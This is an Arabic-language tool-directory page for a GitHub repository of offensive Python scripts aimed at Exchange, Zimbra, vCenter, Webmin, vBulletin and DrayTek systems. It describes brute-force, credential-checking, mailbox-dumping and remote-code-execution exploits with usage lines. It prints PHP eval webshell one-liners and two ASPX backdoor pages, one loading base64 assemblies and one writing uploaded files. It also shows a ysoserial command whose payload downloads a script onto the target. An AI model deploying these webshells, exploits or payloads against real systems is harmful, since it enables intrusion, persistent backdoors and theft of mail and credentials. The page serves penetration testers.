Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Homework-of-Python — أكواد Python الخاصة بمدونتي. | Kitploit
أدوات/GitHubGitHub/3gstudent/homework-of-python
ماسحات الثغرات الأمنيةهجمات كلمات المرورالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالالفريق الأحمرتطوير الحمولات
GitHub3gstudent/homework-of-python

Homework-of-Python

أكواد Python الخاصة بمدونتي.

عرض المستودع
412126منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

واجبات-بايثون

أكواد بايثون من مدونتي.

pptp_password_hack.py

استخدم هجوم القوة الغاشمة (Brute-force) للحصول على كلمة مرور PPTP VPN.

سيقرأ كلمات المرور من ملف (يُسمى wordlist) ثم يستخدم pptpsetup للاتصال بالخادم.

الفاصل الزمني هو 10 ثوانٍ.


portscan.py

يُستخدم لفحص المنافذ.

مهلة الانتظار (timeout) هي 3 ثوانٍ.

نسخة c++:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

يُستخدم للحصول على عنوان IP من الرابط (URL).

يمكنني استخدام نتيجة Sublist3r مباشرة.

file_deduplication(For_urltoip).py

يُستخدم لإزالة عناوين IP المكررة من نتيجة Sublist3r.

يمكنني استخدام نتيجة urltoip.py مباشرة.

يمكن فرز عناوين IP باستخدام Sublime (F9).


file_deduplication.py

يُستخدم لإزالة العناصر المكررة من الملف.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

المرجع:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

يُستخدم لاستدعاء واجهة برمجة التطبيقات (API) الخاصة بـ fofa وطباعة عناوين IP من النتائج.

يمكنك الحصول على 100 نتيجة.

fofa_api_VIP.py

يُستخدم لاستدعاء واجهة برمجة التطبيقات (API) الخاصة بـ fofa وطباعة عناوين IP من النتائج.

إذا كنت من مستخدمي VIP، فستحصل على 10000 نتيجة.


vBulletin_5.x_0day_pre-auth_RCE.py

المرجع:

https://seclists.org/fulldisclosure/2019/Sep/31

مثال.

root@kitploit:~
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

المرجع:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

مثال.

root@kitploit:~
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

يُستخدم لتصدير كلمة مرور متصفح Firefox

get_Exchange_version.py

يُستخدم للحصول على إصدار Exchange.

أولاً احصل على BuildNumber من خلال الكود المصدري للرابط ثم احصل على الإصدار.

المرجع:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

يُستخدم لفحص ثغرة SMBv3 RCE.

مهلة الانتظار (timeout) هي 3 ثوانٍ.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

المرجع:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

أجهزة DrayTek Vigor2960 1.3.1_Beta وVigor3900 1.4.4_Beta وVigor300B 1.3.3_Beta و1.4.2.1_Beta و1.4.4_Beta تسمح بتنفيذ التعليمات البرمجية عن بُعد بصلاحيات root (بدون مصادقة) عبر الأحرف الوصفية للصدفة (shell metacharacters) في مسار cgi-bin/mainfunction.cgi URI..

المنتجات المتأثرة:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

استخدم واجهة برمجة تطبيقات Zimbra SOAP للاتصال بخادم بريد Zimbra.

الاستخدام:

root@kitploit:~
      Zimbra_SOAP_API.py <url> <username> <password> <mode>

الوضع (mode):

  • low مصادقة للحصول على رمز منخفض الصلاحية (low token)
  • admin مصادقة للحصول على رمز المسؤول (admin token)
  • ssrf استخدم CVE-2019-9621 للحصول على رمز المسؤول

مثال:

root@kitploit:~
      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

يُستخدم للتحقق من صحة حساب Exchange Web Service (يدعم plaintext وntlmhash)

المرجع:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

الاستخدام:

root@kitploit:~
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

مثال.

root@kitploit:~
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

يُستخدم للوصول إلى Autodiscover.xml والحصول على إعدادات المستخدم (يدعم plaintext وntlmhash)

الاستخدام:

root@kitploit:~
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

مثال.

root@kitploit:~
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

وضع إضافي لـ checkAutodiscover.py

أضف معامل

ewsManage.py

يُستخدم للوصول إلى Exchange Web Service (يدعم plaintext وntlmhash)

الاستخدام:

root@kitploit:~
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


مثال.

root@kitploit:~
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

يُستخدم للتحقق من صحة بيانات اعتماد SSH (يدعم كلمة المرور وملف المفتاح الخاص)

الاستخدام:

root@kitploit:~
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

مثال.

root@kitploit:~
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

تنفيذ الأوامر عن بُعد عبر SSH (يدعم كلمة المرور وملف المفتاح الخاص)

الاستخدام:

root@kitploit:~
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

مثال.

root@kitploit:~
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

يُستخدم للتحقق من صحة بيانات اعتماد eas (Exchange Server ActiveSync)

الاستخدام:

root@kitploit:~
easCheck.py <host> <user> <password>

مثال.

root@kitploit:~
easCheck.py 192.168.1.1 user1 password1

checkOWA.py

يُستخدم للتحقق من صحة حساب Exchange عبر الاتصال بـ OWA.

الاستخدام:

root@kitploit:~
checkOWA.py <url> <user> <password>

owaManage.py

يُستخدم لقراءة رسائل البريد عبر الاتصال بـ OWA.

الاستخدام:

root@kitploit:~
owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

استخدم IMAP للاتصال بخادم البريد.

الاستخدام:

root@kitploit:~
imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

يُستخدم لتنفيذ مصادقة NTLM والتواصل مع execCmd.aspx

يتم ترميز بيانات الاتصال باستخدام Base64

الاستخدام:

root@kitploit:~
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

نسخة C#: SharpExchangeBackdoor.cs

يُستخدم لإرسال الحمولة (payload) إلى الباب الخلفي لـ Exchange webshell.

يدعم:

  • assemblyLoad
  • webshellWrite

الاستخدام:

root@kitploit:~
    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

مثال.

root@kitploit:~
    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

Zimbra_deserialization_RCE(CVE-2019-6980).py

إلغاء تسلسل الكائنات غير الآمن - IMAP

الاستخدام:

root@kitploit:~
<url> <user> <password> <payload path>

مثال.

root@kitploit:~
https://192.168.1.1 [email protected] password1 payload.obj

ملاحظة:

يمكنك إنشاء payload.obj بهذه الطريقة:

java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj


ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

ExchangeDeserializeShell-NoAuth-ghostfile.py

تُستخدم لاختبار تنفيذ التعليمات البرمجية عبر إلغاء التسلسل (deserialization) في Exchange.
بدءًا من صلاحيات القراءة والكتابة لملفات Exchange وصولًا إلى تنفيذ التعليمات البرمجية عبر إلغاء التسلسل. يجب تعديل machineKey في %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config لتنفيذ تنفيذ التعليمات البرمجية عبر إلغاء التسلسل. <path>: owa أو ecp

الاستخدام:

root@kitploit:~
    <url> <key> <path>

مثال.

root@kitploit:~
 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
 mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

Exchange_EWS_XML_Parser.py

يُستخدم لتحليل رسائل Exchange SOAP XML.


eacManage.py

يُستخدم للوصول إلى مركز إدارة Exchange

الاستخدام:

root@kitploit:~
eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox          
- GetCertificate 
- ExportCertificate          
          

vSphereAutomationAPI_Manage.py

استخدم واجهة برمجة تطبيقات vSphere Automation API(v7.0U1+) لإدارة الأجهزة الافتراضية (VM)

يدعم أجهزة Windows وLinux الافتراضية

vSphereWebServicesAPI_Manage.py

استخدم واجهة برمجة تطبيقات vSphere Web Services API لإدارة الأجهزة الافتراضية

المرجع: https://github.com/vmware/pyvmomi/

التثبيت: pip install --upgrade pyvmomi

vCenterLDAP_Manage.py

يُستخدم لإدارة قاعدة بيانات LDAP على vCenter.


SolarWindsOrion_Manage.py

يُستخدم لإدارة منصة SolarWinds Orion

SolarWindsOrionAPI_Manage.py

استخدم واجهة برمجة تطبيقات SolarWinds Orion API لإدارة منصة Orion


MailEnableManage.py

يُستخدم لإدارة خادم بريد MailEnable


blind_XXEPlatform_CVE-2019-9670.py

يدعم استقبال النتائج عبر بروتوكول HTTP أو FTP.


ewsManage_Downloader.py

يُستخدم للوصول إلى Exchange Web Service (يدعم plaintext وntlmhash)

ewsManage_exchangelib_Downloader.py

يُستخدم للوصول إلى Exchange Web Service (يدعم plaintext وntlmhash)

ewsManage_requests_ntlm_Downloader.py

استخدم requests_ntlm2 للوصول إلى Exchange Web Service (يدعم plaintext وntlmhash)

ewsManage_requests_ntlm_Session_Downloader.py

استخدم requests_ntlm2 للوصول إلى Exchange Web Service (يدعم plaintext وntlmhash)

استخدم الجلسة (session) لتقليل بيانات الاتصال


vCenter_ExtraCertFromMdb.py

معدّل من https://github.com/horizon3ai/vcenter_saml_login

vCenter_GenerateLoginCookie.py

معدّل من https://github.com/horizon3ai/vcenter_saml_login


Exchange_GetVersion_MatchVul.py

يُستخدم للحصول على إصدار Exchange ومطابقته مع الثغرات الأمنية الموجودة

Exchange_GetVersion_ParseFromFile.py

يُستخدم للحصول على إصدار Exchange واستخراج الإصدار من https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019

يجب حفظ https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 باسم exchange.data

Exchange_GetVersion_ParseFromWebsite.py

يُستخدم للحصول على إصدار Exchange واستخراج الإصدار من https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019


Exchange_GetInternalIP.py

يُستخدم للحصول على عنوان IP الداخلي لـ Exchange

مبني على msf auxiliary/scanner/http/owa_iis_internal_ip، لكنه يدعم المزيد من خوادم Exchange.


vRealizeOperationsManager_GetVersion.py

يُستخدم للحصول على إصدار vRealize Operations Manager


BIG-IP_RunBash.py

استخدم bash لتنفيذ الأوامر


SophosUTM_plxDecrypter.py

يُستخدم لفك تشفير ملف .plx الخاص بـ Sophos UTM

المرجع:

https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/the6p4c/bfs_extract

SophosUTM_ConfigParser.py

يُستخدم لتحليل إعدادات Sophos UTM


تنزيل الأداة